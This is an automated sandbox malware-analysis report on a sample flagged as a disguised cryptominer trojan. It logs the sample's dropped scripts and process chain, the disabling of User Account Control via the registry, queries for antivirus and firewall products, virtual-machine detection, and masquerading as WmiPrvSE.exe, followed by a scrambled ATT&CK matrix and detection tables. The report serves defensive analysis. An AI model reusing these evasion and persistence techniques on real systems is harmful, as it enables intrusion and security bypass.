            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6172Thread sleep count: 1161 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -599883s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -599781s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6384Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 908Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7104Thread sleep count: 660 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 4312Thread sleep count: 1856 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -599891s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -599766s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7432Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7172Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0027A5F4
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0028B8E0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028DD72 VirtualQuery,GetSystemInfo,3_2_0028DD72
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData\Local
            Source: w32tm.exe, 00000017.00000002.1792732897.0000022AB9A79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
            Source: CyberLoader.exe, 00000003.00000003.1641748583.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: CyberLoader.exe, 00000003.00000003.1641748583.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630
            Source: WmiPrvSE.exe, 00000026.00000002.3308703399.000000001D000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&es
            Source: CyberLoader.exe, 00000003.00000003.1641748583.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000
            Source: componentWininto.exe, 00000008.00000002.2223794045.000000001C4EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r-0
            Source: WmiPrvSE.exe, 00000023.00000002.3077537785.000000001CF80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9
            Source: WmiPrvSE.exe, 00000023.00000002.3077537785.000000001CF80000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3510931910.000000001C950000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3740806232.000000001C9F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeAPI call chain: ExitProcess graph end nodegraph_3-24475
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B21F0 AttachConsole,IsDebuggerPresent,CoInitializeEx,_invalid_parameter_noinfo_noreturn,GetMessageW,TranslateMessage,DispatchMessageW,GetMessageW,CoUninitialize,_invalid_parameter_noinfo_noreturn,2_2_00007FF7605B21F0
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B33F0 SetWindowLongPtrW,LoadLibraryA,GetProcAddress,FreeLibrary,DefWindowProcW,GetWindowLongPtrW,2_2_00007FF7605B33F0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029753D mov eax, dword ptr fs:[00000030h]3_2_0029753D
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B6520 IsZoomed,#413,SetWindowTextW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetWindowPos,GetProcessHeap,HeapFree,#413,2_2_00007FF7605B6520
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess token adjusted: Debug
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess token adjusted: Debug
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BDD64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7605BDD64
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BE1DC SetUnhandledExceptionFilter,2_2_00007FF7605BE1DC
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BDFFC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7605BDFFC
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028F063 SetUnhandledExceptionFilter,3_2_0028F063
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0028F22B
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0029866F
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0028EF05
            Source: C:\msPortRefnetdhcp\componentWininto.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeProcess created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe "C:\Users\user\AppData\Local\Temp\ yberLoad.exe"
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\MVPLoader.exe "C:\Users\user\AppData\Local\Temp\MVPLoader.exe"
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\CyberLoader.exe "C:\Users\user\AppData\Local\Temp\CyberLoader.exe"
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe"
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msPortRefnetdhcp\componentWininto.exe "C:\msPortRefnetdhcp\componentWininto.exe"
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: unknown unknown
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028ED5B cpuid 3_2_0028ED5B
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_0028A63C
            Source: C:\msPortRefnetdhcp\componentWininto.exeQueries volume information: C:\msPortRefnetdhcp\componentWininto.exe VolumeInformationJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeQueries volume information: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe VolumeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeQueries volume information: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe VolumeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeQueries volume information: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Users\Default\Downloads\WmiPrvSE.exe VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605BDEE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FF7605BDEE0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027ACF5 GetVersionExW,3_2_0027ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\msPortRefnetdhcp\componentWininto.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: WmiPrvSE.exe, 00000023.00000002.3065876347.000000001C093000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3298532991.000000001BFC5000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3501157747.000000001B8B6000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3630561089.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.00000000037C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1848295221.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1747518014.000000001341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: componentWininto.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8120, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 7896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 8044, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 2992, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 6112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 4076, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.00000000037C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1848295221.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1747518014.000000001341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: componentWininto.exe PID: 7352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 8120, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zufsVvjyWcGfJF.exe PID: 7896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 8044, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 2992, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 6112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 4076, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information12
            Scripting
            Valid Accounts241
            Windows Management Instrumentation
            12
            Scripting
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Bypass User Account Control
            11
            Deobfuscate/Decode Files or Information
            LSASS Memory3
            File and Directory Discovery
            Remote Desktop Protocol1
            Clipboard Data
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager57
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Scheduled Task/Job
            21
            Software Packing
            NTDS261
            Security Software Discovery
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control
            Cached Domain Credentials151
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
            Masquerading
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
            Virtualization/Sandbox Evasion
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            [Behavior graph] Behavior Graph ID: 1431492, Sample: 4c6fK85tK7.exe, Startdate: 25/04/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            4c6fK85tK7.exe | 97% | ReversingLabs | Win32.Trojan.DisguisedXMRigMiner |
            4c6fK85tK7.exe | 85% | Virustotal | | Browse
            4c6fK85tK7.exe | 100% | Avira | VBS/Runner.VPG |
            4c6fK85tK7.exe | 100% | Joe Sandbox ML | |
            Source | Detection | Scanner | Label | Link
            C:\Recovery\zufsVvjyWcGfJF.exe | 100% | Avira | HEUR/AGEN.1323984 |
            C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat | 100% | Avira | BAT/Delbat.C |
            C:\Users\user\AppData\Local\Temp\e9b737bd-75a6-4059-b77c-a41b4b38424b.vbs | 100% | Avira | VBS/Starter.VPVT |
            C:\Users\user\AppData\Local\Temp\55dc47f4-7c66-4fb4-aa2a-4ea28e92c8cc.vbs | 100% | Avira | VBS/Runner.VPXJ |
            C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs | 100% | Avira | VBS/Starter.VPVT |
            C:\Recovery\zufsVvjyWcGfJF.exe | 100% | Avira | HEUR/AGEN.1323984 |
            C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs | 100% | Avira | VBS/Runner.VPXJ |
            C:\Users\user\AppData\Local\Temp\CyberLoader.exe | 100% | Avira | VBS/Runner.VPG |
            C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs | 100% | Avira | VBS/Runner.VPXJ |
            C:\Users\Default\Downloads\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984 |
            C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs | 100% | Avira | VBS/Runner.VPXJ |
            C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs | 100% | Avira | VBS/Starter.VPVT |
